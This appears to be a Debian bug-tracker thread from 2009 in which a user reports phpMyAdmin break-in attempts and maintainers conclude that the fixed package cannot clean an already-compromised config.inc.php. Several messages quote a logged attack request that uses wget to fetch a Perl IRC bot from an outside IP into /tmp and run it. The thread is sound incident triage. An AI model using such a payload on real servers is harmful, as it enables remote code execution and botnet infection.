Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Hi, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null; It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages phpmyadmin depends on: ii debconf [debconf-2 1.5.24Debian configuration management sy ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii perl 5.10.0-19 Larry Wall's Practical Extraction ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-mcrypt5.2.6.dfsg.1-1+lenny3 MCrypt module for php5 ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5 Versions of packages phpmyadmin recommends: ii apache22.2.9-10+lenny3 Apache HTTP Server metapackage ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n ii php5-gd5.2.6.dfsg.1-1+lenny3 GD module for php5 Versions of packages phpmyadmin suggests: ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries -- debconf information: phpmyadmin/setup-username: admin * phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Hi Laurant, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/t mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have installed, has been released last Thursday with 1824-1, specifically to address this issue. So if all is right then you should be safe from this issue. Can you explain why you think phpMyAdmin in Lenny is still vulnerable to this issue? thanks, Thijs signature.asc Description: This is a digitally signed message part.
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Hi Dne Mon, 29 Jun 2009 10:58:18 +0200 Thijs Kinkhorst th...@debian.org napsal(a): Hi Laurant, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/t mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have installed, has been released last Thursday with 1824-1, specifically to address this issue. So if all is right then you should be safe from this issue. Can you explain why you think phpMyAdmin in Lenny is still vulnerable to this issue? phpMyAdmin is not vulnerable, but exploited config file is still there even after upgrade -- Michal Čihař | http://cihar.com | http://blog.cihar.com signature.asc Description: PGP signature
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
On moandei 29 Juny 2009, Michal Čihař wrote: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O% 20/t mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have installed, has been released last Thursday with 1824-1, specifically to address this issue. So if all is right then you should be safe from this issue. Can you explain why you think phpMyAdmin in Lenny is still vulnerable to this issue? phpMyAdmin is not vulnerable, but exploited config file is still there even after upgrade Right, but the reporter is basing his report on the presence of log lines trying to exploit the original issue. Which should not be possible anymore. Thijs signature.asc Description: This is a digitally signed message part.
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Hi Dne Mon, 29 Jun 2009 13:39:19 +0200 Thijs Kinkhorst th...@debian.org napsal(a): Right, but the reporter is basing his report on the presence of log lines trying to exploit the original issue. Which should not be possible anymore. No, in the log, he is using exploited config file (with some custom code inside). -- Michal Čihař | http://cihar.com | http://blog.cihar.com signature.asc Description: PGP signature
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
On moandei 29 Juny 2009, Michal Čihař wrote: No, in the log, he is using exploited config file (with some custom code inside). Ah right. I don't think there's a way we can realistically do anything about an already-compromised installation. That is a general truth for any vulnerability: how can we know to what extent the attacker has influenced the system? We could release a fix of config.inc.php which rejects requests specific to the worm that was released. But this is an incomplete fix necessarily. Wouldn't that bring a false sense of security? Thijs -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Hi Dne Mon, 29 Jun 2009 14:07:50 +0200 Thijs Kinkhorst th...@debian.org napsal(a): Ah right. I don't think there's a way we can realistically do anything about an already-compromised installation. That is a general truth for any vulnerability: how can we know to what extent the attacker has influenced the system? We could release a fix of config.inc.php which rejects requests specific to the worm that was released. But this is an incomplete fix necessarily. Wouldn't that bring a false sense of security? Well most problems come from the fact, that setup script is not protected, when user does not use our config snippets for webserver (otherwise the setup script would be password protected and it would not be an issue). In this case we can try to check for some things (like usage of system()), but you're right, this would be incomplete fix. Anyway we should somehow protect against such situations (unprotected setup script which can change configuration). Maybe making /var/lib/phpmyadmin/config.inc.php writable for www-data only if user has enabled our snippets through debconf? -- Michal Čihař | http://cihar.com | http://blog.cihar.com signature.asc Description: PGP signature